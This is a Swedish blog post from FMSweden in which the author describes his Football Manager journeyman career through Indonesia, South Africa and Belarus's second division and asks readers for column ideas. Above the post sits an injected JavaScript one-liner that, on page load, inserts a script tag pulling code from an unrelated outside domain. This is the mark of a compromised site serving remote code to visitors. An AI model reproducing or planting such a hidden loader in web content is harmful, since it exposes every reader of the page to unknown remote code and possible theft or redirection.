;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); AW med Tobbe – Idétorka – FMSweden
Meny Stäng

AW med Tobbe – Idétorka

Rukh Brest i Vitryska andradivisionen, det är där jag har hamnat på min Journeymansave. Efter att ha spenderat 3 säsonger i Asien i Indonesien, så var det dags att dra till Sydafrika. Moroka Swallows blev adressen och där blev bara en halv säsong, innan Vitryssland, eller ja, Belarus kallade. 

Att ge sig ut på världsturnén som en Journeyman innebär, är båda roligt och spännande, men sjukt svårt och extremt tidskrävande. Tiden det tar att scouta spelare och lägga ner tid på taktik är roligt som fan, så länge man orkar.

Man ser framför sig den enorma glädjen i att hitta en diamant nånstans och lyckas bygga framgång som på sikt kan ta dig vidare i din karriär. Jag ser denna saven med ett kortsiktigt tänk och vill hela tiden dra vidare, till skillnad från när man har ett save där man vill bygga långsiktig framgång och bygga en hel klubbs framgång.

I denna saven handlar det mer om att få klubben att ge dig tränarutbildningar i början, att se till att höja ditt rykte så mycket du bara orkar. Så att du på så sätt kan hamna högre upp i hierarkin och ta bättre och bättre jobb.

Just nu har jag dock en 8:e plats i Belarus andraliga som sagt, mina stjärnspelare heter Oleg Korbin och Victor Trusk. Det är precis som det låter, osexigt och ibland sjukt frustrerande.

För övrigt har jag annars grov idétorka vad gäller AW:n just nu, så skicka gärna in förslag.

Jag skriver gärna om olika ämnen, har inget emot att läsa på, även om det kanske får vara saker som jag har lite koll på sen innan.

Att göra en Journeyman på AW:n kanske också är ett sätt att uttrycka det, ge sig ut på okänt vatten och se vad det leder till. Att hela tiden utvecklas och till slut få till den där riktiga kanonen till AW.

Fram tills dess får ni hålla till godo med en mindre, lite mer simpel variant, men jag lovar att det kommer bli matigare och bättre redan nästa vecka.

Ha en fin helg.

Tobbe

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar